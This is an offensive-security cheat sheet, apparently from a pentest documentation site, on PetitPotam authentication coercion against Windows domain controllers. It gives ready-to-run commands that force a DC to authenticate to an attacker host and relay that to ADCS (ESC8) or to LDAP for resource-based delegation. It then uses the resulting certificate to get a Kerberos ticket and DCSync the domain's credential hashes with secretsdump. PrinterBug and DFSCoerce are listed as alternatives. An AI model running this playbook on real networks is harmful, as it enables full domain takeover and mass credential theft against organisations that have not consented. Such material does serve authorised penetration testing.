Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Abuse MS-EFSRPC to coerce target (typically DC) to authenticate to attacker. Relay authentication to ADCS (ESC8) or LDAP for domain takeover.

Coerce Authentication

# https://github.com/topotam/PetitPotam
python3 PetitPotam.py ATTACKER_IP DC_IP
python3 PetitPotam.py ATTACKER_IP DC_IP -u user -p password -d DOMAIN

Unauthenticated (Unpatched)

python3 PetitPotam.py ATTACKER_IP DC_IP

Authenticated

python3 PetitPotam.py -u user -p password -d DOMAIN ATTACKER_IP DC_IP

Relay to ADCS (ESC8) — Full Domain Takeover

Setup ntlmrelayx

impacket-ntlmrelayx -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Trigger PetitPotam

python3 PetitPotam.py ATTACKER_IP DC_IP

Use Certificate

# Get TGT with certificate
python3 gettgtpkinit.py DOMAIN/'DC$' dc.ccache -cert-pfx dc.pfx

# DCSync
export KRB5CCNAME=dc.ccache
impacket-secretsdump -k -no-pass DOMAIN/'DC$'@DC_HOSTNAME

Relay to LDAP (RBCD)

impacket-ntlmrelayx -t ldap://DC_IP --delegate-access --escalate-user attacker

python3 PetitPotam.py ATTACKER_IP DC_IP

Other Coercion Methods

ToolProtocol
PetitPotamMS-EFSRPC
PrinterBug / SpoolSampleMS-RPRN
DFSCoerceMS-DFSNM
ShadowCoerceMS-FSRVP

PrinterBug

# https://github.com/dirkjanm/krbrelayx
python3 printerbug.py DOMAIN/user:password@DC_IP ATTACKER_IP

DFSCoerce

python3 dfscoerce.py -u user -p password -d DOMAIN ATTACKER_IP DC_IP

Quick Reference

StepCommand
CoercePetitPotam.py ATTACKER DC_IP
Relay ADCSntlmrelayx -t http://CA/certsrv/... --adcs
Relay LDAPntlmrelayx -t ldap://DC --delegate-access
Get TGTgettgtpkinit.py DOMAIN/'DC$' dc.ccache -cert-pfx dc.pfx